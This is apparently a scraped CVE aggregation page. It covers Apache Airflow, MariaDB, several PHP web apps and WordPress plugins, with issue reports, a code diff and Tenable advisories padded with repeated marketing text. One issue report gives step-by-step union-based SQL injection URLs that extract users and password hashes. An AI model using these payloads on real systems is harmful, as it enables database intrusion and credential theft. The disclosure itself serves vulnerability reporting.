Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider.This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0.

**Conversation**

This change is to move local\_infile parameter from connection
extra to Hook. Since this feature is only used for very specific
cases, it belongs to the "action" it executes not to the connection
defined in general. For example in Hive and Vertica transfers, the
capability of local\_inline is simply exnabled by bulk\_load
parameter - and it allows to use the same connection in both cases.

 potiuk deleted the remove-local-infile-in-mysql branch

Jan 11, 2023

hussein-awala pushed a commit to hussein-awala/airflow that referenced this pull request

Jan 12, 2023

 

This change is to move local\_infile parameter from connection
extra to Hook. Since this feature is only used for very specific
cases, it belongs to the "action" it executes not to the connection
defined in general. For example in Hive and Vertica transfers, the
capability of local\_inline is simply exnabled by bulk\_load
parameter - and it allows to use the same connection in both cases.

Soonmok pushed a commit to Soonmok/airflow that referenced this pull request

Jan 17, 2023

 

This change is to move local\_infile parameter from connection
extra to Hook. Since this feature is only used for very specific
cases, it belongs to the "action" it executes not to the connection
defined in general. For example in Hive and Vertica transfers, the
capability of local\_inline is simply exnabled by bulk\_load
parameter - and it allows to use the same connection in both cases.

MrGeorgeOwl pushed a commit to lwyszomi/airflow that referenced this pull request

Jan 18, 2023

 

This change is to move local\_infile parameter from connection
extra to Hook. Since this feature is only used for very specific
cases, it belongs to the "action" it executes not to the connection
defined in general. For example in Hive and Vertica transfers, the
capability of local\_inline is simply exnabled by bulk\_load
parameter - and it allows to use the same connection in both cases.

CVE-2023-22884: Move local_infile option from extra to hook parameter by potiuk · Pull Request #28811 · apache/airflow

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 13 and Jan. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for January 13 to January 20

MariaDB Server before 10.3.34 thru 10.9.3 is vulnerable to Denial of Service. It is possible for function spider_db_mbase::print_warnings to dereference a null pointer.

@@ -2090,7 +2090,7 @@ int spider\_db\_mbase::exec\_query( db\_conn->affected\_rows, db\_conn->insert\_id, db\_conn->server\_status, db\_conn->warning\_count); if (spider\_param\_log\_result\_errors() >= 3) print\_warnings(l\_time); fetch\_and\_print\_warnings(l\_time); } else if (log\_result\_errors >= 4) { time\_t cur\_time = (time\_t) time((time\_t\*) 0); @@ -2172,61 +2172,43 @@ bool spider\_db\_mbase::is\_xa\_nota\_error( DBUG\_RETURN(xa\_nota); }  
void spider\_db\_mbase::print\_warnings( struct tm \*l\_time ) { DBUG\_ENTER("spider\_db\_mbase::print\_warnings"); DBUG\_PRINT("info",("spider this=%p", this)); if (db\_conn->status == MYSQL\_STATUS\_READY) void spider\_db\_mbase::fetch\_and\_print\_warnings(struct tm \*l\_time) { DBUG\_ENTER("spider\_db\_mbase::fetch\_and\_print\_warnings");  
if (spider\_param\_dry\_access() || db\_conn->status != MYSQL\_STATUS\_READY || db\_conn->server\_status & SERVER\_MORE\_RESULTS\_EXISTS) DBUG\_VOID\_RETURN;  
if (mysql\_real\_query(db\_conn, SPIDER\_SQL\_SHOW\_WARNINGS\_STR, SPIDER\_SQL\_SHOW\_WARNINGS\_LEN)) DBUG\_VOID\_RETURN;  
MYSQL\_RES \*res= mysql\_store\_result(db\_conn); if (!res) DBUG\_VOID\_RETURN;  
uint num\_fields= mysql\_num\_fields(res); if (num\_fields != 3) { #if MYSQL\_VERSION\_ID < 50500 if (!(db\_conn->last\_used\_con->server\_status & SERVER\_MORE\_RESULTS\_EXISTS)) #else if (!(db\_conn->server\_status & SERVER\_MORE\_RESULTS\_EXISTS)) #endif { if ( spider\_param\_dry\_access() || !mysql\_real\_query(db\_conn, SPIDER\_SQL\_SHOW\_WARNINGS\_STR, SPIDER\_SQL\_SHOW\_WARNINGS\_LEN) ) { MYSQL\_RES \*res = NULL; MYSQL\_ROW row = NULL; uint num\_fields; if ( spider\_param\_dry\_access() || !(res = mysql\_store\_result(db\_conn)) || !(row = mysql\_fetch\_row(res)) ) { if (mysql\_errno(db\_conn)) { if (res) mysql\_free\_result(res); DBUG\_VOID\_RETURN; } /\* no record is ok \*/ } num\_fields = mysql\_num\_fields(res); if (num\_fields != 3) { mysql\_free\_result(res); DBUG\_VOID\_RETURN; } while (row) { fprintf(stderr, "%04d%02d%02d %02d:%02d:%02d \[WARN SPIDER RESULT\] " "from \[%s\] %ld to %ld: %s %s %s\\n", mysql\_free\_result(res); DBUG\_VOID\_RETURN; }  
MYSQL\_ROW row= mysql\_fetch\_row(res); while (row) { fprintf(stderr, "%04d%02d%02d %02d:%02d:%02d \[WARN SPIDER RESULT\] from \[%s\] %ld " "to %ld: %s %s %s\\n", l\_time->tm\_year + 1900, l\_time->tm\_mon + 1, l\_time->tm\_mday, l\_time->tm\_hour, l\_time->tm\_min, l\_time->tm\_sec, conn->tgt\_host, (ulong) db\_conn->thread\_id, (ulong) current\_thd->thread\_id, row\[0\], row\[1\], row\[2\]); row = mysql\_fetch\_row(res); } if (res) mysql\_free\_result(res); } } l\_time->tm\_hour, l\_time->tm\_min, l\_time->tm\_sec, conn->tgt\_host, (ulong) db\_conn->thread\_id, (ulong) current\_thd->thread\_id, row\[0\], row\[1\], row\[2\]); row= mysql\_fetch\_row(res); } mysql\_free\_result(res);  
DBUG\_VOID\_RETURN; }

CVE-2022-47015: MDEV-29644 a potential bug of null pointer dereference in spider_db_m… · MariaDB/server@be0a46b

SQL Injection vulnerability in kishan0725 Hospital Management System thru commit 4770d740f2512693ef8fd9aa10a8d17f79fad9bd (on March 13, 2021), allows attackers to execute arbitrary commands via the contact and doctor parameters to /search.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-48120: in search.php has sql injection · Issue #32 · kishan0725/Hospital-Management-System

The Login with Phone Number WordPress Plugin, version < 1.4.2, is affected by an authenticated SQL injection vulnerability in the 'ID' parameter of its 'lwp_forgot_password' action.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2023-3

CVSSv3 Base / Temporal Score

CVSSv3 Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Affected Products

Quick Event Manager WordPress Plugin

Login with Phone Number WordPress Plugin

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web Application Scanning trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.cs Cloud Security.

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable.io Vulnerability Management, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now.

Your Tenable.cs Cloud Security trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.io Web Application Scanning.

**Contact a Sales Rep to Buy Tenable.cs**

Contact a Sales Representative to learn more about Tenable.cs Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable.asm In Action**

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable.asm. A representative will be in touch soon.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

CVE-2023-23492: Cross-Site Scripting vulnerabilities in Multiple WordPress Plugins

The Survey Maker WordPress Plugin, version < 3.1.2, is affected by an authenticated SQL injection vulnerability in the 'surveys_ids' parameter of its 'ays_surveys_export_json' action.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2023-2

CVSSv3 Base / Temporal Score

CVSSv3 Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Affected Products

Paid Memberships Pro WordPress Plugin

Easy Digital Downloads WordPress Plugin

Survey Maker WordPress Plugin

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web Application Scanning trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.cs Cloud Security.

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable.io Vulnerability Management, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now.

Your Tenable.cs Cloud Security trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.io Web Application Scanning.

**Contact a Sales Rep to Buy Tenable.cs**

Contact a Sales Representative to learn more about Tenable.cs Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable.asm In Action**

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable.asm. A representative will be in touch soon.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

CVE-2023-23490: SQL Injection in Multiple WordPress Plugins

Cross Site Scripting (XSS) vulnerability in InventorySystem thru commit e08fbbe17902146313501ed0b5feba81d58f455c (on Apr 23, 2021) via edit_store_name and edit_active inputs in file InventorySystem.php.

Hello,

I would like to report for possible XSS vulnerabilities.

For example,

In file InventorySystem-master\\application\\controllers\\Stores.php in update function

$data = array(
	'name' => $this\->input\->post('edit\_store\_name'),
	'active' => $this\->input\->post('edit\_active'),	
);

$update = $this\->model\_stores\->update($data, $id);

In file InventorySystem-master\\application\\models\\Model\_stores.php

public function update($data, $id){
  if($data && $id) {
	  $this\->db\->where('id', $id);
	  $update = $this\->db\->update('stores', $data);
	  return ($update == true) ? true : false;
  }
}

Then In file InventorySystem-master\\application\\controllers\\Stores.php

public function fetchStoresDataById($id) {
  if($id) {
	  $data = $this\->model\_stores\->getStoresData($id);
	  echo json\_encode($data);
  }
}

In file InventorySystem-master\\application\\models\\Model\_stores.php

public function getStoresData($id = null){
  if($id) {
	  $sql = "SELECT \* FROM \`stores\` where id = ?";
	  $query = $this\->db\->query($sql, array($id));
	  return $query\->row\_array();
  }
  
  $sql = "SELECT \* FROM \`stores\`";
  $query = $this\->db\->query($sql);
  return $query\->result\_array();
}

CVE-2023-23014: Possible XSS vulnerabilities · Issue #23 · ronknight/InventorySystem

SQL Injection vulnerability in RemoteClinic 2.0 allows attackers to execute arbitrary commands and gain sensitive information via the id parameter to /medicines/profile.php.

**Vulnerability Description:**

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.

Vulnerable Endpoint: http://localhost/RemoteClinic/medicines/profile.php?id=30 (My Medicine Profile ID is **30**)

**Steps to Reproduce:**

1.  Login in Application as Doctor.
2.  Click on Directory.

3.  Click on any medicine profile.

4.  Now PUT single quote in medicine profile endpoint.

5.  Balance the Query to Remove Errors.
    
    **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=30%27--%20-
    

6.  Find Total Numbers of Columns.
    
    **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=30%27%20order%20by%207--%20-
    

7.  Find Vulnerable Columns.
    
    **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%201,2,3,4,5,6,7--%20-
    

8.  Now Extract **Current Database** and **Current User**.
    
    **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20database(),user(),3,4,5,6,7--%20-
    

9.  Extract All **Users** and **Passwords** (md5 hash).
    
    **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20group\_concat(userid,0x3a,passkey,0x0a),2,3,4,5,6,7%20from%20p\_staff\_dir--%20-
    

**Impact:**

An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.

CVE-2022-48152: SQL Injection in /medicines/profile.php via `id` parameter · Issue #20 · remoteclinic/RemoteClinic

Multiple SQL Injection vulnerabilies in tourist5 Online-food-ordering-system 1.0.

Hi,

You have lots of sql injection vulnerabilities. You can write your code with parametrized query for mitigation of sql injection.

Example-1:

https://github.com/tourist5/Online-food-ordering-system/blob/main/all-tickets.php

if(isset($\_GET\['status'\])){  
$status = $\_GET\['status'\];  
}  
else{  
$status = '%';  
}  
$sql = mysqli\_query($con, "SELECT \* FROM comments WHERE status LIKE '$status';");

You can exploit the parameter of $status.

Example-2:

https://github.com/tourist5/Online-food-ordering-system/blob/main/view-ticket.php

You can exploit $id parameter.

CVE-2020-29297: SQL Injection Vulnerabilities · Issue #1 · tourist5/Online-food-ordering-system

SQL Injection vulnerability in inxedu 2.0.6 allows attackers to execute arbitrary commands via the functionIds parameter to /saverolefunction.

Tag

#sql